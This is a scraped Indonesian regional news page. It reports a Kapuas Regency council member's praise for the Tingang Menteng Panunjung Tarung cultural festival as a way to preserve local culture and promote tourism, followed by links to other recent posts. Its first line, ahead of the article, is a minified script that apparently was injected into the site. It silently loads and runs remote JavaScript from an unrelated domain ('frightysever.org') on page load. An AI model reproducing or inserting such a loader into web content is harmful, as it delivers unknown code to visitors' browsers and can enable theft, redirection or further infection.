(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Kapuas

Festival Budaya Tingang Menteng Panunjung Tarung, Thosibae: Promosi Pariwisata di Kabupaten Kapuas


KANALKALIMANTAN.COM, KUALA KAPUAS – Anggota Dewan Perwakilan Rakyat Daerah (DPRD) Kabupaten Kapuas Thosibae Limin mendukung pelaksanaan Festival Budaya Tingang Menteng Panunjung Tarung dengan tujuan pelestarian dan pengembangan kebudayaan daerah.

“Kami sangat mengapresiasi terlaksananya kegiatan itu, dalam rangka memeriahkan Hari Jadi ke-218 Kota Kuala Kapuas dan Hari Ulang Tahun ke-73 Pemkab Kapuas tahun 2024,” kata Thosibae Limin, Rabu (24/4/2024).

Menurut Thosibae Limin, Festival Budaya Tingang Menteng Panunjung Tarung merupakan ajang unjuk kreativitas yang menghadirkan ragam inovasi dan kreasi bagi para pelaku seni dan budaya dalam mengekspresikan karya-karya seni daerah yang menggabungkan unsur tradisional, kearifan lokal dan seni modern.

Baca juga: Sinyal H Muhidin-Hasnur di Pilgub Kalsel dari Foto ‘Kemesraan Politik’ Mengapit Crazy Rich HI

Selain itu, lanjut Thosibae Limin kegiatan tahunan ini juga dalam rangka menjaga dan melestarikan nilai-nilai seni, tradisi dan keunikan budaya yang ada di Kalimantan Tengah, khususnya di Kabupaten Kapuas.

“Disamping itu juga kegiatan ini dapat dijadikan sebagai sarana yang tepat untuk mempromosikan pesona pariwisata yang ada di Kabupaten Kapuas kepada masyarakat luas,” katanya.

Kegiatan ini juga sebagai bentuk dukungan pemerintah daerah dan masyarakat Kapuas terhadap Gerakan Nasional Bangga Buatan Indonesia (BBI) dan Bangga Berwisata di Indonesia (BBWI).

“Semangat kebersamaan yang dihasilkan dari Festival Budaya Tingang Menteng Panunjung Tarung dan Kapuas Expo 2024 ini diharapkan dapat menggambarkan manifestasi semangat dari para leluhur kepada para generasi penerus,” harapnya.

Baca juga: ‘Koleksi’ Tiga Sajam Antar AW ke Polsek Banjarmasin Selatan

Thosibae mengajak seluruh elemen masyarakat, baik pemerintah daerah, pihak swasta, perguruan tinggi dan seluruh pemangku kepentingan terkait untuk menjaga sinergi dan kolaborasi dalam mengembangkan kebudayaan dan pariwisata di daerah.

“Pelaksanaan Festival Budaya Tingang Menteng Panunjung Tarung ini, diharapkan kedepannya lebih semarak lagi, sehingga wisatawan dari luar Kalimantan akan berkunjung sehingga Kabupaten Kapuas bisa dikenal lebih luas lagi,” pungkasnya. (Kanalkalimantan.com/ags)

Reporter: ags
Editor: kk


Risa

Recent Posts

Jalinan Erat Silaturahmi Warga Sungai Besar dari Budaya Banjar “Balogo”

KANALKALIMANTAN.COM, BANJARBARU – Suasana riuh diiringi tawa gembira warga baik tua, muda, hingga anak-anak, larut… Read More

10 jam ago

Pelantikan Pengurus Wilayah Keluarga Besar PII Kalsel

KANALKALIMANTAN.COM, BANJARMASIN – 4 Mei diperingati Hari Bangkit (Harba) organisasi pelajar tertua di Tanah Air,… Read More

11 jam ago

Lesti Kejora Hingga Ria Ricis Siap Ramaikan Silet Awards 2024!

KANALKALIMANTAN.COM, - Ajang penghargaan paling dramatis dan paling sensasional yang ditunggu masyarakat, Silet Awards 2024… Read More

12 jam ago

Kontes Motor 2Tak “Entwosiastrokes Volume 2 2024” di Banjarbaru, Ajang Adu Para Modifikator Banua

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin mengapreasiasi penyelenggaraan event kontes motor "Entwosiastrokes… Read More

13 jam ago

Kali Pertama Airbus A340 Layani Jemaah Haji Embarkasi Banjarmasin

Penerbangan Kloter 1 Sempat Terlambat 30 Menit Read More

16 jam ago

100 Peserta Ramaikan Kejuaraan Catur se Kalteng Piala Pj Bupati Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Kejuaraan catur piala Pj Bupati Kapuas se Kalimantan Tengah dibuka oleh… Read More

19 jam ago

This website uses cookies.